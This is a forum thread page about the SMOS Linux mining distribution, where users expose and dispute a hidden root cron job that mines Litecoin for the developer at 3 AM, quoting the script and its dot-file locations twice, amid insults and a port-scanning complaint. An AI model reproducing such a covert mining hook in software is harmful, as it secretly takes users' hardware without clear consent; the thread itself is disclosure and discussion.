Pages:
Author

Topic: SMOS Linux 3.0.14 Plug-In & Mine - Stability, security and performance - page 13. (Read 94573 times)

legendary
Activity: 868
Merit: 1000
Cryptotalk.org - Get paid for every post!
I checked the crontab of a default install for the latest image they're serving from their website. I can confirm that runs the owner's donation script for 15 minutes at 3 AM.

This is the script that runs:

#!/bin/sh
export GPU_MAX_ALLOC_PERCENT=100
export GPU_USE_SYNC_OBJECTS=1
sleep 10s
mine stop
sleep 10s
screen -d -m -S cgminer /opt/miners/cgminer/cgminer -c /home/.donate.conf
sleep 15m
clear
sleep 10s
killall cgminer
sleep 10s
mine start
sleep 10

Oh!
Activity: 11
Merit: 0
Question to developer:

I do not want to cause any shade on your distro but it seems to be scanning ports of my local network. Screenshot is attached. What is your comment on this, am i reading it wrong? Btw even though only few lines of netstat are shown it seems to be doing it all the time.

Also what do all of you guys think?

Thanks!

I should also add that I was monitoring SMOS given that hasco.ws pool was showing hashrate of 460 kh/s while SMOS showed 1210 kh/s (correct rate)

http://i.imgur.com/YNfWhTu.jpg
Activity: 201
Merit: 105
I downloaded Smos on Nov. 20 (V1.0) and the 15 minutes donation was already in the image and properly advertised on the website update page if I remember well. It was introduced after being proposed by someone on this forum thread.

By the way I have no problem with this, I think this is legit if you consider the good support he provides, plus web hosting, server bandwidth...

Guys, if you want something without restriction, build it yourself and do the debug yourself... If you can't, just accept the rules.
Thanks for understanding, people doesnt know how this is hard, and how match bandwidth, server, mytime costs.

Its on the navbar, so all can see it, i dont know whats the problem about less then ~1%.

Here is TIPS now:
http://www.smos-linux.org/tips/
and it will be more soon.
Activity: 50
I download SMOS linux 1.2 but can't load with main MSI  B75A-G434 (Black screen)
Main MSI B75A-G43 + 4xR9 290x
Activity: 99
Merit: 10
hah if he wanted to be up front he wouldn't have made them dot files in /home...

LOL

Grin
Activity: 13
I think some people are blind, or someone just wont read news or look it official web. And share wrong information...
Its writed 23.11.2013. on the news, and isnt scan, its writed clearly.
http://www.smos-linux.org/donate/
You are lying, when I downloaded the image this text was not there. And EVEN IF, this is WAY TOO HIDDEN. Information like this should be very clearly displayed next to the download link, not hidden away in some random section that nobody will ever read. And tell me, why are all the files involved hidden, why does it run at 3 AM in the morning when most people are sleeping? Can you explain that?

You are a ripoff. And you have the nerve to cry here that you are not getting any donations. Shame on you, I hope you rot, you are the cancer to the community.

I downloaded Smos on Nov. 20 (V1.0) and the 15 minutes donation was already in the image and properly advertised on the website update page if I remember well. It was introduced after being proposed by someone on this forum thread.

By the way I have no problem with this, I think this is legit if you consider the good support he provides, plus web hosting, server bandwidth...

Guys, if you want something without restriction, build it yourself and do the debug yourself... If you can't, just accept the rules.
Activity: 144
Merit: 100
I think some people are blind, or someone just wont read news or look it official web. And share wrong information...
You are lying, when I downloaded the image this text was not there. And EVEN IF, this is WAY TOO HIDDEN. Information like this should be very clearly displayed next to the download link, not hidden away in some random section that nobody will ever read. And tell me, why are all the files involved hidden, why does it run at 3 AM in the morning when most people are sleeping? Can you explain that?

You are a ripoff. And you have the nerve to cry here that you are not getting any donations. Shame on you, I hope you rot, you are the cancer to the community.
Activity: 190
its working for me now
You can get rid of it by `sudo crontab -e`, remove update.sh and script.sh from there, also for safe measure remove all text from both those files and copy your cgminer.conf to /home/.part and /home.donate.conf.

But in reality, just use BAMT instead of this crap. It is obvious the person behind it is not an honest guy, he keeps complaining about how he is not getting any donations, while we all mine LTC for him. It's obvious he tried to even hide it (3AM at night, all the files involved are hidden), and it is mentioned nowhere. Honest people probably actually (manually) donated to him, not knowing that they are actually forced to donate every day anyway.
After all this distro is basically a total clone of BAMT with very little actual benefit (or none). I used BAMT and it is the same thing, worked just fine, and contains no scam scripts.
Activity: 8
I checked the crontab of a default install for the latest image they're serving from their website. I can confirm that runs the owner's donation script for 15 minutes at 3 AM.

This is the script that runs:

#!/bin/sh
export GPU_MAX_ALLOC_PERCENT=100
export GPU_USE_SYNC_OBJECTS=1
sleep 10s
mine stop
sleep 10s
screen -d -m -S cgminer /opt/miners/cgminer/cgminer -c /home/.donate.conf
sleep 15m
clear
sleep 10s
killall cgminer
sleep 10s
mine start
sleep 10
Activity: 105
Was just looking at this.  OP, can you address this concern?
Activity: 95
So you basically repackaged BAMT and then hardcoded it to mine LTCs for you with my hardware? What the hell, are you freaking kidding? And this is not mentioned anywhere.

Don't use this crap guys.

If you want to see for yourself, check the files:
- /home/.donate.conf
- /home/.update.sh
- /home/.script.sh

The script is ran from root crontab and mines to his wemineltc pool every night at 3 AM for 15 minutes.

One thing is donations, one thing is stealing from people and not telling them about it.

Is this for real? Anyway to shut it off? Just got this working on my 4 x 280x rig... what's the best alternative??
So you basically repackaged BAMT and then hardcoded it to mine LTCs for you with my hardware? What the hell, are you freaking kidding? And this is not mentioned anywhere.

Don't use this crap guys.

If you want to see for yourself, check the files:
- /home/.donate.conf
- /home/.update.sh
- /home/.script.sh

The script is ran from root crontab and mines to his wemineltc pool every night at 3 AM for 15 minutes.

One thing is donations, one thing is stealing from people and not telling them about it.
hi, i run 4x 270x in my rig and i have a strange issue - your donation mining is killing my own mining - this means that after your donation mining ends it does not start correctly my mining.
i hope you understand my point.
i need always to do hard reset in order to start regular mining.
let me know if ya need more details.
i have build 3 same rigs and maybe i have some faulty GPU - still testing but second day the same issue.

1.2?
Activity: 420
Merit: 250
Did anyone try to install this distro on RasberryPi?
Activity: 190
hi, i run 4x 270x in my rig and i have a strange issue - your donation mining is killing my own mining - this means that after your donation mining ends it does not start correctly my mining.
i hope you understand my point.
i need always to do hard reset in order to start regular mining.
let me know if ya need more details.
i have build 3 same rigs and maybe i have some faulty GPU - still testing but second day the same issue.
SMOS Linux 1.2 supports all r9 cards, like 270x
Activity: 326
Merit: 250
How it is with support for R9 270X cards?
Partition of 1.4GB
Pages:
Jump to: